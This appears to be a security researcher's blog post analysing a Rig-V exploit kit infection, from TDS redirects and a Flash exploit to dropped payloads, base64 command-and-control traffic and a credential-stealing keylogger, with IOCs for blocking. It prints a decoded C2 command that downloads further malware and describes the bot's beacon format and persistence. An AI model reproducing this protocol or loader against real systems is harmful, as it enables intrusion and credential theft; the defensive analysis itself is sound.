- GET /in/traf/ – 302 redirect via port 18001 (BossTDS port)
- GET /boom/mix.php – 302 redirect via port 18001 (BossTDS port)
- 18.104.22.168 – try.uludan.com – Rig-V EK (landing page, Flash exploit, and payload)
- 22.214.171.124 – POST /faa38820fa/dd6c45917a/d23d3e97c0/chat.php – Base64 encoded data being POSTed back
- 126.96.36.199 – GET /~mysuperp/crypt2_7038.exe – Additional malware downloaded
- 188.8.131.52 – POST /log/index.php – Keylogger POSTing keystrokes (Win.Trojan.Amasages variant outbound connection)
- Post infection DNS queries:
- envioenvio.fromru.su (ET DNS Query for .su TLD (Soviet Union) Often Malware Related)
- polikko.eu (ET TROJAN Possible Kelihos .eu CnC Domain Generation Algorithm (DGA) Lookup NXDOMAIN Response)
- SHA256: df8313906607332c81adeaf2e6671de7e28fd71513e41425faaba89bb23b9a35
File name: try.uludan.com.html Rig-V EK Landing Page
- SHA256: a51c4a6e8797b75620efb64edf297bd2137230a45c18d96f66a3e9edbe988403
File name: try.uludan.com Flash Exploit.swf
- SHA256: 80c719062d50c19c9ccb0cdba52ef20ee53cf26034364e86a51399214d4fba4b
File name: radE5200.tmp.exe Hybrid-Analysis Link
- SHA256: 60ad1ac5cbfaa8bca62a66a4857fb2c9c5094d6272844774b6e305d58a271095
File name: winsvc.exe Hybrid-Analysis Link
Picture of Site:
This site doesn’t appear to be a site that anyone would go to directly. To me it appears like a domain that user’s are redirected to.
For example, I originally discovered this site in my customers network traffic after they visited sites used to watch live streaming sporting events.
Unfortunately, this customer doesn’t give me packets (sad face) so I can’t confirm that the referer for this incident (although sports streaming sites are full of unwanted redirections). Also, I tried to recreate the traffic but was unsuccessful.
Finally, I thought why not try and go directly to the domain and was immediately redirected to a TDS server via an iframe:
The destination port being used for the redirection is TCP port 18001, which is used by BossTDS. TDS, short for Traffic Distribution System, has been used by cyber criminals before as a means to distribute malware. Click HERE to read more about how TDS has been used to distribute malware.
Here is the TCP stream showing that the requested resource located at at the TDS server returning a 302 found:
The host was then redirected to /boom/mix[.]php and the server again returned another 302:
As you can see the second 302 found points directly to a Rig-V Exploit Kit landing page.
Here is a little bit of the obfuscated code that was found on the landing page:
Here is the landing page partially deobfuscated (Thanks to my coworker “elf” for doing the deobfuscation):
You can see the URL for the Flash exploit on the landing page and the URL for the payload.
After the host was redirected to the landing page we can see the Flash exploit being requested and sent back to the host:
This Flash exploit was exploiting CVE-2015-8651 (Flash up to 184.108.40.206/235). Following the Flash exploit we see two identical requests for the payload, which was dropped in %TEMP%:
The file is also created in AppData\Roaming\YFFjZF9i\sirhcqngr.exe, which is showing as a running process under the description “Graph Microsoft”:
We can also see that it created the following registry key under HKEY_CURRENT_USER\Software\YFFjZF9i:
The value for “a” is “aHR0cDovLzExMS4yMjEuNDcuMTYyL2ZhYTM4ODIwZmEvZGQ2YzQ1OTE3YS9kMjNkM2U5N2MwL2NoYXQucGhw”, which decodes to the following:
This is the URL used to POST base64 encoded data back to the server. Here is the first POST request to 220.127.116.11:
Notice the first POST contains the variable “_wv=” and is assigned to the base64 text string “ZW50ZXI.” “ZW50ZXI” decodes to the command “enter”.
The server responds with a 404 error page and its own base64 encoded string “c3VjY2Vzcw,” which decodes to “success”.
Once the infected machine receives the message the malware responds with the same cookie-auth browser agent (auth=bc00595440e801f8a5d2a2ad13b9791b), along with a reply containing encoded data:
The infected machine is POSTing back base64 encoded data in the following format:
- cmd&<GUID of Machine >&<Logged-in Username: System Name: Domain Name>&<Windows Version and Platform> &<AV product Info>&<Date and Time of Execution>
The response from the server is this chunk of base64 data “MTQ2OTEwMDA5Njg4MjAwMCNib3RraWxsZXIjMTQwMTA3NjM4NjcxNTc2NiNyYXRlIDUj”. This decodes to the following:
- 1469100096882000#botkiller#1401076386715766#rate 5#
We can also see that there is a .vbs file in the user’s Startup folder containing the following command:
After letting the system sit for awhile I found it made a similar POST request as before, however this time the server responded with encoded data containing a download URL for additional malware:
The base64 contained in the response decodes to:
- 1469100096882000#botkiller#1401076386715766#rate 5#1480369403542508#LOADER hxxp://18.104.22.168/~mysuperp/crypt2_7038.exe
We then see the host make a GET request for the additional malware (crypt2_7038.exe):
There is an additional file (NN6B09.tmp) created in %TEMP% and the file “winsvc.exe” dropped in Startup:
Following the execution of winsvc.exe we see POST request to 22.214.171.124 – POST /log/index.php, which contains encoded data (partial image of POST request):
However, taking a closer look at the POSTed data we can actually see that it is a screenshot of my desktop and it is being tagged with my username (Home) and MAC address (blacked out). Using http://www.url-encode-decode.com/ to decode the data we can see the image being sent over the wire:
ET alerted on this traffic as a keylogger POSTing keystrokes (Win.Trojan.Amasages variant outbound connection). This is true as going to Chase.com and entering in fake credentials shows that they were POSTed back to server (along with typos), as well as documenting what browser I’m using, the time of the traffic, the folders and programs that I have open, and the websites that are open:
As always, I recommend blocking the IPs and domains listed in the IOCs section.
- Shout-out to Twitter user @luutala for giving me the following reference which helped in augmenting my investigation
On December 13th, 2016, @sysopfb informed me that, judging by the name from the panel source, the keylogger is calling itself XKeyScore.
Panel login for “XKeyScore”:
XKEYSCORE (abbreviated as XKS) is also the name of a formerly secret computer system first used by the United States National Security Agency for searching and analyzing global Internet data.